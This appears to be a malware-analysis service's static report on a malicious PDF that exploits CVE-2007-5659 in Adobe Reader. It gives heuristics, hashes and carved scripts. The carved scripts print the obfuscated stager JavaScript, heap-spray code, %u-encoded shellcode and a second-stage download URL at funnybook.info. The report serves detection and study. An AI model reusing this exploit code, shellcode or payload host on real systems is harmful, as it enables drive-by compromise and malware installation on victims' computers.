Malicious PDF — malware analysis report

Static analysis result for SHA-256 6b0d7ba238765756…

MALICIOUS

PDF

16.9 KB
MD5: e699d23b72cf5bee378faf9de11255c9 SHA-1: c4535207f3f6db35df2decc8077ea24fdf41fe65 SHA-256: 6b0d7ba23876575650a50a48cbdbe879709e40a4d394e44b5188dd05b28a6d8c
406 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed to download a second-stage payload from the URL http://funnybook.info/page/information.html/n00a106201X945d952aY3304045c. The presence of anti-analysis checks and version gating further indicates malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER
    PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://funnybook.info/page/information.html/n00a106201X945d952aY3304045c Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x4148 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
annotation_subject_callee_hex_stage_000.js
7830b87c94ba2bcd77e6a0b126eeba0c5a728f5b05908a9c4e5d2e0f56ba95ee		 deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x1A9A 5355 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var O00HN_8L2P = new Array();var n_jp_v_a_i8 = 0;var P_h_Io3 = "";function D_GN1v8e5ea_7xm(QW__0GY34_E, n_733c_b){var tdv_yFk = n_733c_b.toString();var S2Q_f_r8x_e = "";for(var a1__5E0SRyi3 = 0; a1__5E0SRyi3 < tdv_yFk.length; a1__5E0SRyi3++) {var C_X_d30i5O_m0nk = parseInt(tdv_yFk.substr(a1__5E0SRyi3, 1));if (!isNaN(C_X_d30i5O_m0nk)) {C_X_d30i5O_m0nk = C_X_d30i5O_m0nk.toString(16);if (C_X_d30i5O_m0nk.length == 1) { C_X_d30i5O_m0nk = "0" + C_X_d30i5O_m0nk; }else if (C_X_d30i5O_m0nk.length != 2) { C_X_d30i5O_m0nk = "00"; }S2Q_f_r8x_e = C_X_d30i5O_m0nk + S2Q_f_r8x_e;if (S2Q_f_r8x_e.length == 8) {break;}}}while(S2Q_f_r8x_e.length < 8) { S2Q_f_r8x_e = "0" + S2Q_f_r8x_e; }var m4_LRE_4K = QW__0GY34_E.toString(16);if (m4_LRE_4K.length == 1) { m4_LRE_4K = "0" + m4_LRE_4K; }else if (m4_LRE_4K.length != 2) { m4_LRE_4K = "00"; }S2Q_f_r8x_e = "3" + m4_LRE_4K + "P" + S2Q_f_r8x_e;return S2Q_f_r8x_e;}function f4_OA1H3t_ta(iIFybc51JtX_3t, Sd3Pri2___5h){var c7QlMkLRa3LLw = new Array("");var i_e__DI30_g = iIFybc51JtX_3t;var tD0Axaw;if ((tD0Axaw = iIFybc51JtX_3t.lastIndexOf("%u00")) != -1) {if (tD0Axaw + 6 == iIFybc51JtX_3t.length) {c7QlMkLRa3LLw[0] = iIFybc51JtX_3t.substr(tD0Axaw + 4, 2);i_e__DI30_g = iIFybc51JtX_3t.substring(0, tD0Axaw);}}tD0Axaw = 1;for (a1__5E0SRyi3 = 0; a1__5E0SRyi3 < Sd3Pri2___5h.length; a1__5E0SRyi3++) {var PMe_dsxri3R0_8u = Sd3Pri2___5h.charCodeAt(a1__5E0SRyi3).toString(16);if (PMe_dsxri3R0_8u.length == 1) { PMe_dsxri3R0_8u = "0" + PMe_dsxri3R0_8u; }c7QlMkLRa3LLw[tD0Axaw] = PMe_dsxri3R0_8u;tD0Axaw++;}a1__5E0SRyi3 = c7QlMkLRa3LLw[0].length ? 0 : 1;c7QlMkLRa3LLw[tD0Axaw] = "00";c7QlMkLRa3LLw[tD0Axaw + 1] = "00";tD0Axaw += 2;if ((c7QlMkLRa3LLw.length - a1__5E0SRyi3) % 2) {c7QlMkLRa3LLw[tD0Axaw] = "00";}while(a1__5E0SRyi3 < c7QlMkLRa3LLw.length) {i_e__DI30_g += "%u" + c7QlMkLRa3LLw[a1__5E0SRyi3 + 1] + c7QlMkLRa3LLw[a1__5E0SRyi3];a1__5E0SRyi3 += 2;}i_e__DI30_g += "%u0000";return i_e__DI30_g;}function K6w_m1C_3(HmSJ_RK_MxpQ3b, TF_WwC460f_5o63){while (HmSJ_RK_MxpQ3b.length*2<TF_WwC460f_5o63) {HmSJ_RK_MxpQ3b += HmSJ_RK_MxpQ3b;}HmSJ_RK_MxpQ3b = HmSJ_RK_MxpQ3b.substring(0,TF_WwC460f_5o63/2);return HmSJ_RK_MxpQ3b;}function Q03NWHiw8g(y7Y_p2_X, I5d_1_Uq, A____g4){var vG5mA6a82u = 0x0c0c0c0c;var HmSJ_RK_MxpQ3b = unescape(I5d_1_Uq);var Sd3Pri2___5h = D_GN1v8e5ea_7xm(y7Y_p2_X, A____g4);var Ul8_WP_00CE = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var iIFybc51JtX_3t = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6d70%u6352%u7875%u4764%u0063%u7468%u7074%u2f3a%u662f%u6e75%u796e%u6f62%u6b6f%u692e%u666e%u2f6f%u6170%u6567%u692f%u666e%u726f%u616d%u6974%u6e6f%u682e%u6d74%u2f6c%u306e%u6130%u3031%u3236%u3130%u3958%u3534%u3964%u3235%u5961%u3333%u3430%u3430%u6335";app.fEe__5WObb = unescape(f4_OA1H3t_ta(iIFybc51JtX_3t, Sd3Pri2___5h));var h_yocX___d = 0x400000;var X_03_3lCyXo = Ul8_WP_00CE.length * 2;var TF_WwC460f_5o63 = h_yocX___d - (X_03_3lCyXo+0x38);HmSJ_RK_MxpQ3b = K6w_m1C_3(HmSJ_RK_MxpQ3b, TF_WwC460f_5o63);var k8d___0qAV8a3G = (vG5mA6a82u - 0x400000)/h_yocX___d;for (var HkTw_DukcmYa_4J = 0; HkTw_DukcmYa_4J < k8d___0qAV8a3G; HkTw_DukcmYa_4J+
... (truncated)
legacy_pdfkit_stage_000.js
bc167015959d52b8e22bae73926af2b82e5ba53b2f52217dfd2f2f0b67841dbd		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1AEE 11943 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function y_Gc3C7787s(lHq_Y_7e_1s, FFbv1nHl6A__F_4){var NSj_m_Q54x7h = new Array();var U_w_QsKg = 512;var O8057h___g7IAQ = 21;var L6IRhj = 0;var bknV_A_B = 0;var AX_PBvEiJR_J = 0;var Dc2abCfY8__eTV = "";var tbB__U7_S6 = "";var O_8__f = 6;try {var X025__dt = 0;if (app) {AX_PBvEiJR_J = AX_PBvEiJR_J + 2;FFbv1nHl6A__F_4 = pr[X025__dt].subject;}} catch(e) { }AX_PBvEiJR_J = AX_PBvEiJR_J + 5;if (!lHq_Y_7e_1s) { NSj_m_Q54x7h = new Array(208,221,116,142,190,2);} else {NSj_m_Q54x7h = lHq_Y_7e_1s;}var yVT2__D_yK = 0;var o6_cQee = 0;var P84h_h = 0;while(o6_cQee < FFbv1nHl6A__F_4.length) {var m5R__243Nn5t__g = FFbv1nHl6A__F_4.substr(o6_cQee, 2);var SQr_Y7Ul7_1ia = parseInt(m5R__243Nn5t__g, 21);if (yVT2__D_yK >= O_8__f) {yVT2__D_yK = 0;}SQr_Y7Ul7_1ia -= NSj_m_Q54x7h[yVT2__D_yK] * (P84h_h + 2);if (SQr_Y7Ul7_1ia < 0) {SQr_Y7Ul7_1ia -= Math.floor(SQr_Y7Ul7_1ia / 256) * (U_w_QsKg / 2);}if (o6_cQee >= 0) {SQr_Y7Ul7_1ia = String.fromCharCode(SQr_Y7Ul7_1ia);}if (AX_PBvEiJR_J == 6) {Dc2abCfY8__eTV += YCc_L41r4gb;} else if (AX_PBvEiJR_J == 7) {Dc2abCfY8__eTV += SQr_Y7Ul7_1ia;} else {Dc2abCfY8__eTV += o6_cQee;}yVT2__D_yK++;o6_cQee += 2;P84h_h++;}var pqg_k5ll04 = this;pqg_k5ll04['ev'+'al'](Dc2abCfY8__eTV);}
	y_Gc3C7787s(0, "11bh33ak962k880da45g1b4i6k344c835j717i751303337h639ba630618c4db86aa6128c3h0a73186f8d1k0hbh3g936ka95kbaa62a91ad7a7k03bg85627d1b2619947j061h98aibk6h236ibj34aj3f197b3390ad365j3072351eb177b80h7cbbb09j652g0j0j84985d8h4b0d702c1a0g984d8e4eb31d6642736g8179b8192j5k4209252j0jb7c34c776c250c9f973a6i070f2faf9d6hbb2b16221476997fbb688c7i7i6j5c95a05b47054b4k3da24d309b839c9c30267i9h4b9b2f6k3c0i907f9j6kb97k1gb6ad8i9g9d8jb5a7175a0e13998c36557e9cbh6d2j17bk281g5b7i7g0a76bk309d4165aa1k0i0i32983c0d9cb00b48be4c7d2e7k6k4j4a703k50969e4h85631h3e0g3g31b89k80a5653a16798a3d6g422g451f8f4g2960bj7i2a8c9b7563aj7065987247221c967092ae4b366h5i20ac7f8g706b4e602d3j7j345j316baa900g8ca39g3c03b9b096bk6b9516b35660290i8b05278774149g29b72faa034c5b745h6h2c3k6h4583bc2j5490112b374a3g0ea26ibe4g1i0h3a801k2j095kb9b78f54a67hb53e136572957ca96e71839i4g1i2k76712d9j3k634a271h6aaja66f3065611d4b681k6g1i580d6k0ebb887g2a6i88a54kaj8090922h4b59258e81370794ab956g8283a44d0353ae6f20940g00961e901f101fc09b165c0hc34g625b1ac0b56c5d947933625bc19h9h0f4cc07536563b610j4f68b6293g2i41a84i5c0039931b7937ag5b5f9i2940ba995d05994ibhbd231505467g1da6857d5g574654ba0f923h6f47113g603k61bi81c29c3j8ba6c158891k0f2e15a18cba2c2c7i4i99bh4gb69ba2c39h778c42c0ah5k6326525723640110bg25bi5k2gaj4d7d293d3h396jac1i1a612d044446c384913jbi48b0b288463515759f1b097945591d12393g66445e9i7866471b3g4484bh4100860i2583791abk9j821a7ka9a59gc072937d3j2i2fbd847i59bd5g2i7g4c6k9iafb87f4j9b4f0a4f96240h435kb5c03a2f077j189fb22a942e629d0d4756591hbcad6b0j808c1a9hb3bd2caa035k9k503c3h3e313d1fa3b9263653aa102e1i00496i31841caea43d9k3d40ajbf040h8724c120bd6f3e2g9c454c739c467c543b07254i525k175i8a7i5baj6a6dbe510ia2312f3d96bd2e1f4gaj94a23j887g2a6i884h51be80bg8b723i544eaj8a9c2694a38a49ad6kb20691210d722k8fbf284c306k12a4b4508i024eag9e747g2e0523ak045h6k7d2f980e280j0g478a567541333461726h9b8k5d4b951e1i4a613fb70k4ja966ae1a6e89254f9k2534158b7faf2j27340e8b957j8d61688i759j5211aa595a031e37739a282207819ga0095da4c360731e4c504a9gb6b581275g31a8bg7i988ia4c3a5a1634c3f078h09154g5gb673571d8e23184h799a2463c10g9d694ab2bf1kag190b6436a3bha846b53e8b50658850536274359190607e9bbc3c4228397kai5h714b5f0e7c82103b3a1f1h438676be2gag7j137ea18360bb7294bd865d2k0da087bib13h32a957ba77838h6k32223h032b7k1b753i6i758a406h9j924gbg2d7665bb7395abai266h18bdbi2d21875g04a247ad0126bd84737j6b7h2g3a6152a7a92553a80j11513c0j078472b01h1809416k503cak6i281k81309d8hae5g166g6gak8d9j9i778a9c5306005a75261i2c564a2a1k6a79af673a6c67186d77096e08580764ab7kbi8746b0ag135kb4a0b78g33296420bi8d5a21a4agbk6g7j75ak0g915b89443c9j0b439716a93a2004bia7207e2f932a572db82ab8741j646b0b928abebc9f2f6kbjaf2b262531ad525daj254b2i18b81j49286609276e3jae6e8k672671097656058b4fb1962a4b2c7ea2218j557a5e7c3h54b0ae7i5975451k3g6b1k541e93biaa009e850352a8291c6c478ba29j2c088j0k9e7d44b59g8g0c9c4h7c3e2ha9806h4782891f4fc20kbk05281j19763a74c31g165a6i1g30bc3306066h2b0k8hbi40bk118983585c584c629e3ha9af4h7h352640453659259i55a73d536k73ba3d6k007518c25k4bae048g640
... (truncated)
deobfuscated.js
187c696a11741299499d8a8873cf14bad125d18498e0ea86b5d49805158c5af0		 deobfuscated-js PDF JavaScript deobfuscation pass 92725 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
11bh33ak962k880da45g1b4i6k344c835j717i751303337h639ba630618c4db86aa6128c3h0a73186f8d1k0hbh3g936ka95kbaa62a91ad7a7k03bg85627d1b2619947j061h98aibk6h236ibj34aj3f197b3390ad365j3072351eb177b80h7cbbb09j652g0j0j84985d8h4b0d702c1a0g984d8e4eb31d6642736g8179b8192j5k4209252j0jb7c34c776c250c9f973a6i070f2faf9d6hbb2b16221476997fbb688c7i7i6j5c95a05b47054b4k3da24d309b839c9c30267i9h4b9b2f6k3c0i907f9j6kb97k1gb6ad8i9g9d8jb5a7175a0e13998c36557e9cbh6d2j17bk281g5b7i7g0a76bk309d4165aa1k0i0i32983c0d9cb00b48be4c7d2e7k6k4j4a703k50969e4h85631h3e0g3g31b89k80a5653a16798a3d6g422g451f8f4g2960bj7i2a8c9b7563aj7065987247221c967092ae4b366h5i20ac7f8g706b4e602d3j7j345j316baa900g8ca39g3c03b9b096bk6b9516b35660290i8b05278774149g29b72faa034c5b745h6h2c3k6h4583bc2j5490112b374a3g0ea26ibe4g1i0h3a801k2j095kb9b78f54a67hb53e136572957ca96e71839i4g1i2k76712d9j3k634a271h6aaja66f3065611d4b681k6g1i580d6k0ebb887g2a6i88a54kaj8090922h4b59258e81370794ab956g8283a44d0353ae6f20940g00961e901f101fc09b165c0hc34g625b1ac0b56c5d947933625bc19h9h0f4cc07536563b610j4f68b6293g2i41a84i5c0039931b7937ag5b5f9i2940ba995d05994ibhbd231505467g1da6857d5g574654ba0f923h6f47113g603k61bi81c29c3j8ba6c158891k0f2e15a18cba2c2c7i4i99bh4gb69ba2c39h778c42c0ah5k6326525723640110bg25bi5k2gaj4d7d293d3h396jac1i1a612d044446c384913jbi48b0b288463515759f1b097945591d12393g66445e9i7866471b3g4484bh4100860i2583791abk9j821a7ka9a59gc072937d3j2i2fbd847i59bd5g2i7g4c6k9iafb87f4j9b4f0a4f96240h435kb5c03a2f077j189fb22a942e629d0d4756591hbcad6b0j808c1a9hb3bd2caa035k9k503c3h3e313d1fa3b9263653aa102e1i00496i31841caea43d9k3d40ajbf040h8724c120bd6f3e2g9c454c739c467c543b07254i525k175i8a7i5baj6a6dbe510ia2312f3d96bd2e1f4gaj94a23j887g2a6i884h51be80bg8b723i544eaj8a9c2694a38a49ad6kb20691210d722k8fbf284c306k12a4b4508i024eag9e747g2e0523ak045h6k7d2f980e280j0g478a567541333461726h9b8k5d4b951e1i4a613fb70k4ja966ae1a6e89254f9k2534158b7faf2j27340e8b957j8d61688i759j5211aa595a031e37739a282207819ga0095da4c360731e4c504a9gb6b581275g31a8bg7i988ia4c3a5a1634c3f078h09154g5gb673571d8e23184h799a2463c10g9d694ab2bf1kag190b6436a3bha846b53e8b50658850536274359190607e9bbc3c4228397kai5h714b5f0e7c82103b3a1f1h438676be2gag7j137ea18360bb7294bd865d2k0da087bib13h32a957ba77838h6k32223h032b7k1b753i6i758a406h9j924gbg2d7665bb7395abai266h18bdbi2d21875g04a247ad0126bd84737j6b7h2g3a6152a7a92553a80j11513c0j078472b01h1809416k503cak6i281k81309d8hae5g166g6gak8d9j9i778a9c5306005a75261i2c564a2a1k6a79af673a6c67186d77096e08580764ab7kbi8746b0ag135kb4a0b78g33296420bi8d5a21a4agbk6g7j75ak0g915b89443c9j0b439716a93a2004bia7207e2f932a572db82ab8741j646b0b928abebc9f2f6kbjaf2b262531ad525daj254b2i18b81j49286609276e3jae6e8k672671097656058b4fb1962a4b2c7ea2218j557a5e7c3h54b0ae7i5975451k3g6b1k541e93biaa009e850352a8291c6c478ba29j2c088j0k9e7d44b59g8g0c9c4h7c3e2ha9806h4782891f4fc20kbk05281j19763a74c31g165a6i1g30bc3306066h2b0k8hbi40bk118983585c584c629e3ha9af4h7h352640453659259i55a73d536k73ba3d6k007518c25k4bae048g640d7kc31696c27j8f8b2d2e2fae9i623hae3h3d6a4c5375a0aba561a17g3f5db029b8136b88c316b418af1eb0223796198a03a15a487a251d976709bb8127907g90b70c0j7i0g797280356b0i337j03115c39170e39214479a53a8f272j9d3a9k4b2daj9a1e13b65e8baj982g3c3i894b6fa7805f7e40350e386f3h84ac6481844jba9j6cbg510g9e46ac496j1e0g1k60b69gb545ba764c8ibg6i8kc28g8ja6975e5217964c8bb16k6k9g65bf941d27093d306b2j7hbf435d407fc0bg2e820fa052ag9ka25734a2b988a3207279196i0k2e0f0j06522k752a3c47683g4460b02b3i9c2b1035483291b53bah352219998h406c930k2607676fad3b0d20166ea7848b5e48524c7g4d95218d43b948346h823j24a973aiaf2h567h9h3eb71c7d5c0i907f9569004k250bbgb6ba069g9594ai7c3e0hb4572a3b8j8haj313c9jbibk0f536ca12c6c210j8f538da8331g0730066a0b9333bi36bi3ead2f6j542e459a34219e791j4h99a8021628658e947f896b3dc36b901f5d432c320f8372be3f9b670i8j095157894061ab6729bj0b6j89c30d764k8g7ebd979h079g631b6h2b2f9626572g7gaf902j6801873cbebe916a1g8a1609a8263i0h9h8a0g36ah7k1a924e9712b8bf7c75443e54bb33664h7ja20e2687ah2i5k4a41239h2kbe411g395e8e3a2b9j5d2d01ba5bbe8bb46g3i6b9h706d7ha16785a02h1c03464k2i034c7g6i3c488dag1j780j6f3dac62791a883g41a2759jb6b878657h8bac9627b9ah9f391b2c35bc7047128c8jba548fae07120024a76f5f921939980i771bc01a1b0fbe5bbh9j49872h1e048b3f1ja357388b7a1a00b0366fbib13k344031a8545d9f523k1i
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.